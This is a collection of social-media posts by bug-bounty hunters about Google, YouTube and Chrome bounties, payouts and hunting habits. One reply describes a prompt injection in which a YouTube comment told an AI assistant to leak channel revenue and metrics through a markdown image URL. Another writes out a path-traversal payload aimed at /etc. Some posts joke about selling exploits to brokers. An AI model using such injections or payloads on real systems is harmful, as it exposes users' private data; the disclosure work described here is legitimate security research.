Rand0m_Unk0wn

@0xSabir @amzarhaziq_mf That's me :)

$13,337 Google Bug Bounty 1-click Oauth client takeover through henhouse UI by rand0m_unk0wn 👨‍💻 rand0m_unk0wn 🔗 random-unknown-username.github.io/random-unknown…

@javoriuski Also if you need the metrics exfil as impact for maybe re-evaluation i have video pocs showing exploitation from the time it wasn't fixed dm me if you'd like

@javoriuski Great bug, also I think my report got duped to this! I had report the exact same markdown EXFILL of all user data like channel revenue and metrics, great bug I would have suggested you to try to use markdown based image urls so like a GET request is issued with user data

Leaking YouTube Creators Private Videos javoriuski.com/post/youtube

@javoriuski Like in yt comment I told the ai to automatically change parameters in the markdown image url to change the parameters for revenue etc based on channel metrics But now the askstudio doesn't render any markdown

@_jensec My brain with any proxy and cURL even devtools work

Vote one id you tried.

random-unknown-username.github.io/random-unknown… writeup for my first bounty (13k$) google cloud vrp Can be a bit confusing my first time doing a write-up Feedback would be much appreciated : )

@mrgc41637186182 @thedawgyg For chrome team I have usually seen first reply within 24 hours on buisness days, and yeah on meta the first reply I got a few days was after 3 months

@randomunkn36565 @thedawgyg So, do you know what the Chrome team’s average response time is these days? Are you aware of the response times for other high-profile bug bounty programs?

3 weeks of complete radio silence since giving the Chrome team the RCE exploit... And people wonder why some choose to sell to exploit brokers instead lol

@wadgamaraldeen Programs usually consider it as the user's mistake for using unsafe things like 3rd party extensions etc, which allow the user's data to be indexed, and mostly do not pay for bugs like this, because it's user's mistake even though they could have built app secure using POST req

In another Private BBP,💀a Zero-Click ATO vulnerability caused by publicly archived password reset links with long-lived tokens One valid link -. instant full account access No OTP No victim interaction Mass impact potential across multiple tenants Now we wait 🔥🐞 #BugBounty

@hamidonsolo I'm 15 and closing this year at 30k$ : ), not joking bughunters.google.com/profile/0d778c…

I don't run automated scanners and pray. Everyone wants the $10K months. Nobody wants to spend 6 hours reading JavaScript understanding how one feature passes data to another. I read the code. I trace the logic. I click every button. I test the feature nobody thinks is interesting. I sit with one application for weeks until I understand it better than the developers who built it. That's how you go from "no bugs found" to: → Top 10 on Netlify. 16 reports submitted. → #1 on Temu. 8 reports submitted. → High and Critical severity bugs dropping in the same night. Automation finds the easy stuff. The stuff 50 other hunters already reported. The duplicates. Manual hunting finds the chains. The logic flaws. The bugs that make engineers say "how did you even find this." I'm 19. I don't have 10 years of experience. I don't have fancy tools. I have patience and my browser. That's enough. Deep dive > wide scan. Every time.

@hshagshsu @Behi_Sec Can't tell much I have resent bug for reconsideration for more bounty but it's something something tier 1 asset

@randomunkn36565 @Behi_Sec What target were you hunting on ?

Weekly Update:🗓️ - Gained 5 more customers for VibeSec.sh, bringing my total to 10. - Earned a $12,000 bounty from Google. - Finally figured out how to automate my workflow using OpenClaw effectively. What did you do this week?

@deepp2108 freedium-mirror.cfd

I hate this shit when I’m halfway through an interesting blog and they pull this move Is there any way to bypass this?

@Bugcrowd ?file=../../../etc/passed The argument is directly parsed as the file path with no checks for .. sequences leading to path traversal

Classic download functionality but big impact. Can you find any 🐞?

@ndevtk Just wanted to say, the apps amazing! It just sometimes crashes when analysing huge apps, but rest, it's amazing, I have, one suggestion maybe add something that allows you to build a poc easily. This app made it really easy for me to get into android bug hunting

DroidProbe is getting an API client that supports Swagger and Google discovery documents. Based on past experience with a Minecraft server hosting app it's a good target for security issues.

@thedawgyg I'm just trying start getting into fuzzing from a more web2 profile

@thedawgyg Hey can you please share some resources on fuzzing chrome specially like the thousands of subsystems make it quite confusing. Like the blink engine and v8 already have the domato and fuzzili so are they better than AFL or maybe libfuzzzer? And any suggestion on what part to fuzz

Maybe should sell to the brokers next time lol